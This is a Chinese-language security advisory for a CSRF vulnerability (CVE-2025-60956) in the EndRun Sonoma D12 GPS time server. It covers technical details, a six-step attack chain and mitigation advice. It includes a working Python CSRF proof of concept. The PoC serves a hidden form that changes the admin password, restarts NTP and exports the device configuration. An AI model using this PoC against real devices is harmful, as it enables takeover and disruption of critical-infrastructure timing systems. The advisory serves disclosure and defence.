CVE-2025-60956：EndRun Sonoma D12时间服务器CSRF远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-60956

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

EndRun Technologies Sonoma D12 Network Time Server (GPS)

漏洞概述

CVE-2025-60956是EndRun Technologies Sonoma D12网络时间服务器（NTP/GPS授时设备）固件版本F/W 6010-0071-000 Ver 4.00中存在的一个高危跨站请求伪造（CSRF）漏洞。该漏洞于2025年10月6日由MITRE公开发布，CVSS 3.1评分为8.0分，属于高危级别。Sonoma D12是一款广泛应用于电信、金融、电力、政府等关键基础设施领域的精密时间同步设备，其安全性直接影响依赖时间戳的下游系统和业务逻辑的可靠性。

该漏洞允许远程攻击者在合法用户（管理员）已认证会话的情况下，通过精心构造的恶意网页或HTTP请求，诱使管理员浏览器在不知情的情况下向Sonoma D12设备的管理接口发送未经授权的请求。由于设备未对关键管理操作实施CSRF令牌验证或Origin/Referer检查，攻击者可利用此漏洞执行任意代码、触发拒绝服务（DoS）攻击、提升权限以及获取敏感信息。

考虑到该设备在关键基础设施中的核心地位，一旦被成功利用，可能导致时间同步服务中断、授时数据被篡改或敏感网络配置信息泄露，进而引发连锁安全事件。该漏洞由xdiv安全研究团队发现并报告，其CVSS向量为AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H，表明攻击需要网络访问、低权限认证及用户交互，但一旦成功，将对机密性、完整性和可用性均造成高影响。

技术细节

CSRF（Cross-Site Request Forgery，跨站请求伪造）是一种利用用户已认证会话执行非预期操作的攻击方式。在Sonoma D12时间服务器的管理Web界面中，设备未在关键管理操作的HTTP请求中嵌入不可预测的CSRF令牌（anti-CSRF token），也未对请求的Origin或Referer头部进行严格校验，导致服务器无法区分合法用户请求与跨站伪造请求。

攻击原理如下：攻击者首先需要获取目标Sonoma D12设备的管理员登录入口（通常为HTTP/HTTPS Web管理界面），然后构造一个包含恶意请求的HTML页面（例如通过<img src="http://target-device/cmd?action=reboot">或自动提交的隐藏表单）。当管理员在已登录设备的状态下访问该恶意页面时，浏览器会自动携带有效的会话Cookie向设备发送请求。由于设备缺乏CSRF防护机制，该请求将被视为合法操作并执行。

利用方式包括：（1）通过CSRF触发设备固件更新或配置修改，实现任意代码执行或持久化后门植入；（2）通过CSRF调用设备重启、关闭NTP服务等管理接口，造成拒绝服务，影响依赖时间同步的关键业务；（3）通过CSRF修改用户权限配置或创建新的管理员账户，实现权限提升；（4）通过CSRF导出设备配置文件、日志或密钥等敏感数据。攻击者还可以结合社会工程学手段（如钓鱼邮件）将恶意页面投递至管理员，扩大攻击面。

攻击链分析

STEP 1

步骤1：侦察与目标识别

攻击者通过网络扫描（如Shodan、Censys）或社会工程学手段识别暴露在网络中的EndRun Sonoma D12时间服务器，获取其管理Web界面地址（通常为HTTP/HTTPS 80/443端口）。

STEP 2

步骤2：获取管理员会话

攻击者通过钓鱼攻击、凭据泄露或其他方式获取管理员凭据，或等待管理员在浏览器中保持登录状态（会话Cookie有效）。

STEP 3

步骤3：构造CSRF恶意页面

攻击者构造包含恶意HTTP请求的HTML页面，利用<img>标签、隐藏表单或JavaScript自动提交等方式，向Sonoma D12设备发送未授权的管理操作请求（如修改配置、重启服务、导出数据等）。

STEP 4

步骤4：投递恶意页面

攻击者通过钓鱼邮件、即时消息或恶意广告等方式，将恶意页面链接投递至管理员，诱使其在已登录设备的状态下点击访问。

STEP 5

步骤5：执行恶意操作

管理员浏览器自动携带有效会话Cookie向Sonoma D12设备发送请求。由于设备缺乏CSRF防护，请求被成功执行，攻击者实现任意代码执行、拒绝服务、权限提升或敏感信息窃取。

STEP 6

步骤6：持久化与影响扩散

攻击者在获取设备控制权后，可植入后门、修改时间同步配置或利用该设备作为跳板攻击内网其他关键基础设施系统，扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60956 - EndRun Sonoma D12 CSRF PoC
# Author: Security Research
# Description: Demonstrates CSRF attack against Sonoma D12 NTP Server
# Target Firmware: F/W 6010-0071-000 Ver 4.00

import http.server
import socketserver
import urllib.parse

# Target Sonoma D12 device management interface
TARGET_HOST = "http://192.168.1.100"  # Replace with actual target IP
TARGET_PORT = 80

# Malicious HTML page that performs CSRF attack
CSRF_HTML = """
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Please wait while content loads...</h1>

    <!-- CSRF Attack Vector 1: Change admin password via hidden form -->
    <form id="csrf_form" action="%s/cgi-bin/config_user.cgi" method="POST">
        <input type="hidden" name="username" value="admin" />
        <input type="hidden" name="password" value="pwned123" />
        <input type="hidden" name="action" value="modify" />
    </form>

    <!-- CSRF Attack Vector 2: Trigger NTP service restart (DoS) -->
    <img src="%s/cgi-bin/restart_service.cgi?service=ntpd" style="display:none" />

    <!-- CSRF Attack Vector 3: Export sensitive configuration -->
    <img src="%s/cgi-bin/export_config.cgi?type=all" style="display:none" />

    <script>
        // Auto-submit the form when page loads (requires admin session)
        document.getElementById('csrf_form').submit();
    </script>
</body>
</html>
""" % (TARGET_HOST, TARGET_HOST, TARGET_HOST)

class CSRFHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(CSRF_HTML.encode())

if __name__ == "__main__":
    PORT = 8080
    with socketserver.TCPServer(("", PORT), CSRFHandler) as httpd:
        print(f"[*] CSRF server running on port {PORT}")
        print(f"[*] Send this URL to the admin: http://attacker-server:{PORT}")
        print(f"[*] When admin (logged into {TARGET_HOST}) visits, attack executes")
        httpd.serve_forever()

影响范围

EndRun Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：（1）将Sonoma D12管理界面隔离至独立的可信管理网络，限制仅特定管理员IP可访问；（2）管理员在完成配置操作后立即登出，避免会话长时间保持；（3）使用专用浏览器访问管理界面，避免同时打开其他网页；（4）监控设备日志中的异常操作记录；（5）考虑在管理网络前端部署WAF（Web应用防火墙），配置CSRF防护规则拦截可疑跨站请求；（6）定期轮换管理员密码并启用强密码策略。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60956
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60956
3 Details https://www.cvedetails.com/cve/CVE-2025-60956/
4 VulDB https://vuldb.com/cve/CVE-2025-60956
5 Link http://endrun.com
6 Link http://sonoma.com
7 Link https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12